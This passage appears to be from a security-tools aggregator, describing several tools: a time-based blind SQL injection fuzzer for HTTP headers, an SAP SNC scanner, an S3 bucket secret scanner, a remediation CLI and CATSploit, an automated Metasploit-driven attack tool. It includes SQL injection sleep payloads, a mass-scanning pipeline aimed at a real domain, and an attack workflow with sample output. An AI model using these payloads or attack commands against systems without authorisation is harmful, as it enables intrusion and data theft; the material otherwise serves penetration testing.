    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --thread 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




    SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

    By: Zion3R


    SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.


    Key Features

    • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
    • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
    • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
    • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
    • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

    Installation

    git clone https://github.com/danialhalo/SqliSniper.git
    cd SqliSniper
    chmod +x sqlisniper.py
    pip3 install -r requirements.txt

    Usage

    This will display help for the tool. Here are all the options it supports.

    ubuntu:~/sqlisniper$ ./sqlisniper.py -h


    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
    โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–„โ–„ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ–€โ–€โ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•

    -: By Muhammad Danial :-

    usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
    [--threads THREADS]

    Detect SQL injection by sending malicious queries

    options:
    -h, --help show this help message and exit
    -u URL, --url URL Single URL for the target
    -r URLS_FILE, --urls_file URLS_FILE
    File containing a list of URLs
    -p, --pipeline Read from pipeline
    --proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
    --payload PAYLOAD File containing malicious payloads (default is payloads.txt)
    --single-payload SINGLE_PAYLOAD
    Single payload for testing
    --discord DISCORD Discord Webhook URL
    --headers HEADERS File containing headers (default is headers.txt)
    --threads THREADS Number of threads

    Running SqliSniper

    Single Url Scan

    The url can be provided with -u flag for single site scan

    ./sqlisniper.py -u http://example.com

    File Input

    The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

    ./sqlisniper.py -r url.txt

    piping URLs

    The SqliSniper can also worked with the pipeline input with -p flag

    cat url.txt | ./sqlisniper.py -p

    The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

    subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

    Scanning with custom payloads

    By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

    ./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

    While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

    ubuntu:~/sqlisniper$ cat payloads.txt 
    0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
    "0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
    0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

    Scanning with Single Payloads

    If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

    ./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

    Scanning Custom Header

    Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

    ubuntu:~/sqlisniper$ cat headers.txt 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    X-Forwarded-For: 127.0.0.1

    Sending Discord Alert Notifications

    SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

    ./sqlisniper.py -r url.txt --discord <web_hookurl>

    Multi-Threading

    Threads can be defined with --threads flag

     ./sqlisniper.py -r url.txt --threads 10

    Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.


    SqliSniper is made inย  pythonย with lots of <3 by @Muhammad Danial.



    Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

    By: Zion3R


    Tool for analyzing SAP Secure Network Communications (SNC).

    How to use?

    In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


    SAP Router

    SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:

    sncscan -H 10.3.161.4 -S 3299 -p router

    DIAG / SAP GUI

    The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background

    sncscan -H 10.3.161.3 -S 3200 -p diag

    Multiple targets can be scanned with one command:

    sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

    Through SAP Router

    sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

    Install

    Requirements: Currently the sncscan only works with the pysap libary from our fork.

    python3 -m pip install -r requirements.txt

    or

    python3 setup.py test
    python3 setup.py install

    Background: SNC system parameters

    SNC Basics

    SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

    1. Authentication only: Verifies the identity of the communication partners
    2. Integrity protection: Protection against manipulation of the data
    3. Confidentiality protection: Encrypts the transmitted messages

    SNC Parameter

    Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

    • snc/data_protection/min: Minimum security level required for SNC connections.
    • snc/data_protection/max: highest security level, initiated by the SAP system
    • snc/data_protection/use: default security level, initiated from the SAP system

    Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

    Reading out SNC Parameters

    As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

    By: Zion3R


    Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


    What is Mobb?

    Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

    What does Bugsy do?

    Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

    Scan

    • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
    • Analyzes the vulnerability report to identify issues that can be remediated automatically
    • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

    Analyze

    • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
    • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

    Disclaimer

    This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

    Usage

    You can simply run Bugsy from the command line, using npx:

    npx mobbdev


    CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

    By: Zion3R


    CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterโ€™s skill) .

    CATSploit automatically performs penetration tests in the following sequence:

    1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

    2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

    3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

    4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


    Prerequisities

    CATSploit has the following prerequisites:

    • Kali Linux 2023.2a

    Installation

    For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

    Installing CATSploit

    To install the latest version of CATSploit, please use the following commands:

    Cloneing and setup
    $ git clone https://github.com/catsploit/catsploit.git
    $ cd catsploit
    $ git clone https://github.com/catsploit/cats-helper.git
    $ sudo ./setup.sh

    Editing configuration file

    CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

    • DBMS
      • dbname: database name created for CATSploit
      • user: username of PostgreSQL
      • password: password of PostgrSQL
      • host: If you are using a database on a remote host, specify the IP address of the host
    • SCENARIO
      • generator.maxscenarios: Maximum number of scenarios to calculate (*)
    • ATTACKPF
      • msfpassword: password of MSFRPCD
      • openvas.user: username of PostgreSQL
      • openvas.password: password of PostgreSQL
      • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
      • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
    • ATTACKDB
      • attack_db_dir: Path to the folder where AtackSteps are stored

    (*) Adjust the number according to the specs of your machine.

    Usage

    To start the server, execute the following command:

    $ python cats_server.py -c [CONFIG_FILE]

    Next, prepare another console, start the client program, and initiate a connection to the server.

    $ python catsploit.py -s [SOCKET_PATH]

    After successfully connecting to the server and initializing it, the session will start.

       _________  ___________       __      _ __
    / ____/ |/_ __/ ___/____ / /___ (_) /_
    / / / /| | / / \__ \/ __ \/ / __ \/ / __/
    / /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
    \____/_/ |_/_/ /____/ .___/_/\____/_/\__/
    /_/

    [*] Connecting to cats-server
    [*] Done.
    [*] Initializing server
    [*] Done.
    catsploit>

    The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

    usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

    positional arguments:
    {host,scenario,scan,plan,attack,post,reset,help,exit}

    options:
    -h, --help show this help message and exit

    I've posted the commands and options below as well for reference.

    host list:
    show information about the hosts
    usage: host list [-h]
    options:
    -h, --help show this help message and exit

    host detail:
    show more information about one host
    usage: host detail [-h] host_id
    positional arguments:
    host_id ID of the host for which you want to show information
    options:
    -h, --help show this help message and exit

    scenario list:
    show information about the scenarios
    usage: scenario list [-h]
    options:
    -h, --help show this help message and exit

    scenario detail:
    show more information about one scenario
    usage: scenario detail [-h] scenario_id
    positional arguments:
    scenario_id ID of the scenario for which you want to show information
    options:
    -h, --help show this help message and exit

    scan:
    run network-scan and security-scan
    usage: scan [-h] [--port PORT] targe t_host [target_host ...]
    positional arguments:
    target_host IP address to be scanned
    options:
    -h, --help show this help message and exit
    --port PORT ports to be scanned

    plan:
    planning attack scenarios
    usage: plan [-h] src_host_id dst_host_id
    positional arguments:
    src_host_id originating host
    dst_host_id target host
    options:
    -h, --help show this help message and exit

    attack:
    execute attack scenario
    usage: attack [-h] scenario_id
    positional arguments:
    scenario_id ID of the scenario you want to execute

    options:
    -h, --help show this help message and exit

    post find-secret:
    find confidential information files that can be performed on the pwned host
    usage: post find-secret [-h] host_id
    positional arguments:
    host_id ID of the host for which you want to find confidential information
    op tions:
    -h, --help show this help message and exit

    reset:
    reset data on the server
    usage: reset [-h] {system} ...
    positional arguments:
    {system} reset system
    options:
    -h, --help show this help message and exit

    exit:
    exit CATSploit
    usage: exit [-h]
    options:
    -h, --help show this help message and exit

    Examples

    In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

    catsploit> scan 192.168.0.0/24
    Network Scanning ... 100%
    [*] Total 2 hosts were discovered.
    Vulnerability Scanning ... 100%
    [*] Total 14 vulnerabilities were discovered.
    catsploit> host list
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ hostID โ”ƒ IP โ”ƒ Hostname โ”ƒ Platform โ”ƒ Pwned โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ” โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ attacker โ”‚ 0.0.0.0 โ”‚ kali โ”‚ kali 2022.4 โ”‚ True โ”‚
    โ”‚ h_exbiy6 โ”‚ 192.168.0.10 โ”‚ โ”‚ Linux 3.10 - 4.11 โ”‚ False โ”‚
    โ”‚ h_nhqyfq โ”‚ 192.168.0.20 โ”‚ โ”‚ Microsoft Windows 7 SP1 โ”‚ False โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ด โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> host detail h_exbiy6
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ hostID โ”ƒ IP โ”ƒ Hostname โ”ƒ Platform โ”ƒ Pwned โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ h_exbiy6 โ”‚ 192.168.0.10 โ”‚ ubuntu โ”‚ ubuntu 14.04 โ”‚ False โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€ โ”€โ”€โ”€โ”€โ”€โ”˜

    [IP address]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ipv4 โ”ƒ ipv4mask โ”ƒ ipv6 โ”ƒ ipv6prefix โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ โ”‚ โ”‚ โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Open ports]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ip โ”ƒ proto โ”ƒ port โ”ƒ service โ”ƒ product โ”ƒ version โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 21 โ”‚ ftp โ”‚ ProFTPD โ”‚ 1.3.5 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ ssh โ”‚ OpenSSH โ”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ http โ”‚ Apache httpd โ”‚ 2.4.7 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 445 โ”‚ netbios-ssn โ”‚ Samba smbd โ”‚ 3.X - 4.X โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ ipp โ”‚ CUPS โ”‚ 1.7 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Vulnerabilities]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ip โ”ƒ proto โ”ƒ port โ”ƒ vuln_name โ”ƒ cve โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 0 โ”‚ TCP Timestamps Information Disclosure โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 21 โ”‚ FTP Unencrypted Cleartext Login โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak MAC Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Encryption Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Host Key Algorithm(s) (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Test HTTP dangerous methods โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check โ”‚ CVE-2014-3704 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Sensitive File Disclosure (HTTP) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Unprotected Web App / Device Installers (HTTP) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Cleartext Transmission of Sensitive Information via HTTP โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ jQuery < 1.9.0 XSS Vulnerability โ”‚ CVE-2012-6708 โ”‚
